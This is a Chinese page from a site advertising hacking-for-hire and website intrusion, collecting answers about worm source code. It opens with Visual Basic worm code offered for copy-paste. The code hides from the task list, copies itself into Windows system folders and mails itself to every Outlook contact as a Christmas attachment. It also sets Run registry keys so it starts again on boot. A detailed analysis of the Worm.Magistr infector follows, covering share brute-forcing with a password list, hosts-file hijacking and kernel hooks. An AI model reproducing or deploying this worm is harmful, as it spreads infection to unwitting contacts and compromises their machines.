黑客24小时在线接单网站

黑客在线接单,网站入侵,渗透测试,渗透网站,入侵网站

c语言蠕虫病毒源代码(c语言编写蠕虫病毒)

本文目录一览:

蠕虫病毒代码是多少,我只是想把代码放在记事本里

========================从这行以下开始复制===========================

Sub Main()

'TaskVisible的功能是把程序在End Task表中除掉。

App.TaskVisible = False

'阻止问题发生

On Error Resume Next

Dim Location, Location2, DesLocation, DesLocation2

'得到EXE的位置

Location = App.Path "\" App.EXEName ".exe"

Location2 = App.Path App.EXEName ".exe"

'设定目的地

DesLocation = "C:\WINDOWS\SYSTEM\WinMapi.exe"

DesLocation2 = "C:\WINNT\SYSTEM\Mapi.exe"

'开始复制自己

FileCopy Location, DesLocation

FileCopy Location2, DesLocation

FileCopy Location, DesLocation2

FileCopy Location2, DesLocation2

Dim Var1, FilePath, FileName, FullLocation, MyApp

Dim Christmas, List, AddList, AddressListCount

Dim Merry, AdEntries, Attachs, Msg

Var1 = "True"

FilePath = App.Path

FileName = App.EXEName

FullLocation = FilePath "\" FileName

Set MyApp = CreateObject("Outlook.Application")

If MyApp = "Outlook" Then

Set Christmas = MyApp.GetNameSpace("mapi")

Set List = Christmas.AddressLists

For Each Addresslist In List

If Addresslist.AddressEntries.Count 0 Then

AddressListCount = Addresslist.AddressEntries.Count

For AddList = 1 To AddressListCount

Set Merry = MyApp.CreateItem(0)

Set AdEntries = Addresslist.AddressEntries(AddList)

Merry.To = AdEntries.Address

Merry.Subject = "圣诞节快乐!!"

Merry.Body = "圣诞节快乐!这是一个特别个你的圣诞节的礼物!过个快乐的圣诞节! "

Set Attachs = Merry.Attachments

Attachs.Add FullLocation

If Var1 = "true" Then

Merry.DeleteAfterSubmit = True

If Msg.To "" Then

Merry.send

End If

End If

Next

Beep

End If

Next

End If

Dim Reg

Set Reg = CreateObject("wscript.Shell")

'把资料写入Registry

Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mapi", "C:\WINNT\SYSTEM\Mapi.exe"

Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinMapi", "C:\WINDOWS\SYSTEM\WinMapi.exe"

End Sub

====================这行和这行以下不要复制===========================

可以用的话,别忘了给我分,测试 *** :保存时把记事本名称的后缀改为.bat用杀软查毒。

蠕虫病毒是怎么 *** 的要用到哪些代码

蠕虫病毒是一种常见的计算机病毒。它是利用 *** 进行复制和传播,传染途径是通过 *** 和电子邮件。最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。 蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过 *** 连接)。请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,它是一种独立智能程序。有两种类型的蠕虫:主机蠕虫与 *** 蠕虫。主计算机蠕虫完全包含(侵占)在它们运行的计算机中,并且使用 *** 的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔",蠕虫病毒一般是通过1434端口漏洞传播。 比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,去年春天流行“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者 *** 共享进行传播,最终破坏用户的大部分重要数据。 蠕虫病毒的一般防治 *** 是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件。 蠕虫是怎么发作的? 如何采取有效措施防范蠕虫? 一、利用操作系统和应用程序的漏洞主动进行攻击 此类病毒主要是“红色代码”和“尼姆亚”,以及至今依然肆虐的”求职信”等。由于IE浏览器的漏洞(IFRAME EXECCOMMAND),使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播,SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。 二、传播方式多样 如“尼姆亚”病毒和”求职信”病毒,可利用的传播途径包括文件、电子邮件、Web服务器、 *** 共享等等。 三、病毒 *** 技术新 与传统的病毒不同的是,许多新病毒是利用当前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技术,可以潜伏在HTML页面里,在上网浏览时触发。 四、与黑客技术相结合,潜在的威胁和损失更大 以红色代码为例,感染后的机器的web目录的\scripts下将生成一个root.exe,可以远程执行任何命令,从而使黑客能够再次进入。 蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里的漏洞或者说是缺陷,可以分为两种,即软件上的缺陷和人为的缺陷。软件上的缺陷,如远程溢出、微软IE和Outlook的自动执行漏洞等等,需要软件厂商和用户共同配合,不断地升级软件。而人为的缺陷,主要指的是计算机用户的疏忽。这就是所谓的社会工程学(social engineering),当收到一封邮件带着病毒的求职信邮件时候,大多数人都会抱着好奇去点击的。对于企业用户来说,威胁主要集中在服务器和大型应用软件的安全上,而对个人用户而言,主要是防范第二种缺陷。 五、对个人用户产生直接威胁的蠕虫病毒 在以上分析的蠕虫病毒中,只对安装了特定的微软组件的系统进行攻击,而对广大个人用户而言,是不会安装IIS(微软的因特网服务器程序,可以允许在网上提供web服务)或者是庞大的数据库系统的。因此,上述病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过 *** 产生影响)。但接下来分析的蠕虫病毒,则是对个人用户威胁更大,同时也是最难以根除,造成的损失也更大的一类蠕虫病毒。 对于个人用户而言,威胁大的蠕虫病毒采取的传播方式,一般为电子邮件(Email)以及恶意网页等等。 对于利用电子邮件传播的蠕虫病毒来说,通常利用的是各种各样的欺骗手段诱惑用户点击的方式进行传播。恶意网页确切地讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。

Worm.Win32.Agent.wb是什么病毒

病毒名称: Worm.Magistr.g

病毒是由C语言编写的感染型病毒,感染后缀名为EXE的32位PE可执行程序,病毒源的大小为40KB。

病毒源文件为boot.exe,由用户从U盘上提取。

病毒源文件流程:

boot.exe运行后检查自己是否在驱动器根目录下,如不是退出。

检查是否存在"C:\WINNT\linkinfo.dll",如果不存在则建立该文件。

检查驱动文件是否存在,如不存在则生成驱动文件%SystemRoot%\system32\drivers\IsDrv118.sys(加载后删除),并调用ZwSetSystemInformation加载驱动。

装载该dll,然后查找病毒调用序号为101的导出函数。

DLL流程:

DLL被装载时:

1、获得系统sfc.dll中的SfcIsFileProtected函数地址,以便在感染时调用以防止感染受系统保护的文件。

2、获取系统的linkinfo.dll(%system32%目录下)的下列导出函数,使自己导出的同名函数指向正常的linkinfo.dll中正确的函数,以便转接这些函数。

ResolveLinkInfoW

ResolveLinkInfoA

IsValidLinkInfo

GetLinkInfoData

GetCanonicalPathInfoW

GetCanonicalPathInfoA

DisconnectLinkInfo

DestroyLinkInfo

CreateLinkInfoW

CreateLinkInfoA

CompareLinkInfoVolumes

CompareLinkInfoReferents

3、检查自己是否在explorer.exe进程中,如不是则启动病毒主线程。

4、启动病毒主线程

病毒首先通过VMWare后门指令检查是否是在VMWare下运行,如果是直接重启机器,以此来防止自己在虚拟机中被运行。

生成名称为"PNP#DMUTEX#1#DL5"的互斥量,以保证只有一个实例在运行。

然后开始启动各工作线程

5、工作线程1(生成窗口和消息循环)

生成隐藏的窗口和消息循环,并通过调用RegisterDeviceNotificationA注册设备通知消息,当发现插入可移动磁盘时,向可移动磁盘写入病毒源boot.exe。

6、工作线程2(遍历并感染所有磁盘)

从"C:\"开始感染所有磁盘中后缀名为"exe"的文件。

病毒在感染时,不感染" *** "、"winnt"和"windows"目录下的程序文件,并通过调用SfcIsFileProtected来检查是否为系统文件,如是则不感染。

同时,病毒不感染以下程序:

wooolcfg.exe

woool.exe

ztconfig.exe

patchupdate.exe

trojankiller.exe

xy2player.exe

flyff.exe

xy2.exe

大话西游.exe

au_unins_web.exe

cabal.exe

cabalmain9x.exe

cabalmain.exe

meteor.exe

patcher.exe

mjonline.exe

config.exe

zuonline.exe

userpic.exe

main.exe

dk2.exe

autoupdate.exe

dbfsupdate.exe

asktao.exe

sealspeed.exe

xlqy2.exe

game.exe

wb-service.exe

nbt-dragonraja2006.exe

dragonraja.exe

mhclient-connect.exe

hs.exe

mts.exe

gc.exe

zfs.exe

neuz.exe

maplestory.exe

nsstarter.exe

nmcosrv.exe

ca.exe

nmservice.exe

kartrider.exe

audition.exe

zhengtu.exe

7、工作线程3(禁止其它病毒、破坏卡卡助手和感染 *** )

枚举进程,如果进程的程序文件名(包括目录)是如下程序(常见的病毒程序),将终止该进程

realschd.exe

cmdbcs.exe

wsvbs.exe

msdccrt.exe

run1132.exe

sysload3.exe

tempicon.exe

sy *** mw.exe

rpcs.exe

msvce32.exe

rundl132.exe

svhost32.exe

*** ss.exe

lsass.exe

internat.exe

explorer.exe

ctmontv.exe

iexplore.exe

ncscv32.exe

spo0lsv.exe

wdfmgr32.exe

upxdnd.exe

ssopure.exe

iexpl0re.exe

c0nime.exe

svch0st.exe

nvscv32.exe

spoclsv.exe

*** jacks.exe

logo_1.exe

logo1_.exe

lying.exe

sxs.exe

病毒通过修改卡卡助手的驱动"%system32%\drivers\RsBoot.sys"入口,使该驱动在加载时失败。

枚举 *** 资源,并尝试对 *** 资源中的文件进行感染。

枚举并尝试向局域网中计算机的隐藏共享文件夹"%s\\IPC$"、"C$"等写入名称为"setup.exe"的病毒源文件,尝试连接时使用"Administrator"作为用户名,并使用下列密码尝试。

password1

monkey

password

abc123

qwerty

letmein

root

mypass123

owner

test123

love

admin123

qwer

!@#$%^*()

!@#$%^*(

!@#$%^*

!@#$%^

!@#$%^

!@#$%

asdfgh

asdf

!@#$

654321

123456789

12345

admin

8、工作线程4(修改host文件并下载)

备份host文件为host.txt,并下载文件代替。

查找系统html文件的关联程序,启动并注入dll以便穿过防火墙的拦截。

尝试连接以下地址并下载文件

*****rg/c.asp

****rg/top.dat

9、工作线程5(监视并禁止其它病毒)

通过调用驱动获得新生成的进程,如果进程的文件是指定程序(见工作线程3),终止该进程

驱动:

该驱动加载后首先通过替换 SDT 的中的函数地址挂钩

ZwSaveKey

ZwQueryDirectoryFile

ZwClose

ZwEnumerateKey

ZwLoadDriver

...

等 API 来保护病毒的注册表键值不被发现和修改,并隐藏病毒文件(boot.exe, linkinfo.dll, nvmini.sys等),

以及禁止一些安全软件的驱动加载。

然后,驱动创建一个名为 DL5CProc 的设备。用户进程可以通过 ioctl = 25270860 来获得最后一个创建进程的进程 ID。

这个进程 ID 是通过调用 PsSetCreateProcessNotifyRoutine 得到的通知获得。

该驱动还会通过 PsSetLoadImageNotifyRoutine 设置映像加载通知,如果加载的映像文件在以下子目录中:

COMMON FILES, WINDOWS\SYSTEM32, WINNT\SYSTEM32

并且名为:

DLLWM.DLL

WININFO.RXK

RICHDLL.DLL

WINDHCP.DLL

DLLHOSTS.DLL

NOTEPAD.DLL

RPCS.DLL

RDIHOST.DLL

RDFHOST.DLL

RDSHOST.DLL

LGSYM.DLL

RUND11.DLL

MDDDSCCRT.DLL

WSVBS.DLL

CMDBCS.DLL

UPXDHND.DLL

该驱动会通过修改物理内存修改模块入口是这些模块返回失败,无法成功加载。这些动态库多是一些盗密码的

病毒以及Worm.Viking的动态库,所以被 Magister 感染的系统不会再感染这些病毒。

被感染的文件:

病毒感染文件时,会将原文件最后一个节增大,将病毒代码写入被感染文件的代码节,修改入口点指向病毒代码并保存原来的入口点地址,然后将被覆盖的原来文件的代码、病毒的dll、sys文件压缩保存在文件最后一个节中增大的地方。被感染的文件运行时,病毒代码先被运行,释放C:\WINNT\linkinfo.dll和%SystemRoot%\system32\drivers\IsDrv118.sys并加载,然后调用linkinfo.dll的序号为101的函数。病毒代码最后会恢复原文件被覆盖的代码并跳回原文件的入口开始运行原来的文件。

“马吉斯(Worm.Magistr)”病毒专杀工具

*** 蠕虫病毒代码分析

蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其

他的计算机系统中(通常是经过 *** 连接)。请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类型的蠕虫:主机蠕虫与 *** 蠕虫。主计算机蠕虫完全包含在它们运行的计算机中,并且使用 *** 的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔",蠕虫病毒一般是通过1434端口漏洞传播。

比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者 *** 共享进行传播,最终破坏用户的大部分重要数据。蠕虫病毒的一般防治 *** 是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件。

形成原因利用漏洞主动进行攻击

此类病毒主要是“红色代码”和“尼姆亚”,以及至今依然肆虐的“求职信”等。由于IE浏览器的漏洞(IFRAMEEXECCOMMAND),使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播,SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。

传播方式多样

如“尼姆亚”病毒和”求职信”病毒,可利用的传播途径包括文件、电子邮件、Web服务器、 *** 共享等等。

病毒 *** 技术新

与传统的病毒不同的是,许多新病毒是利用当前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VBScript等技术,可以潜伏在HTML页面里,在上网浏览时触发。

  • 评论列表:
  •  断渊做啡
     发布于 2023-02-28 08:40:59  回复该评论
  • ateLinkInfoW CreateLinkInfoA CompareLinkInfoVolumes CompareLinkInfoReferents 3、检查自己是否在explorer.exe进程中,

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.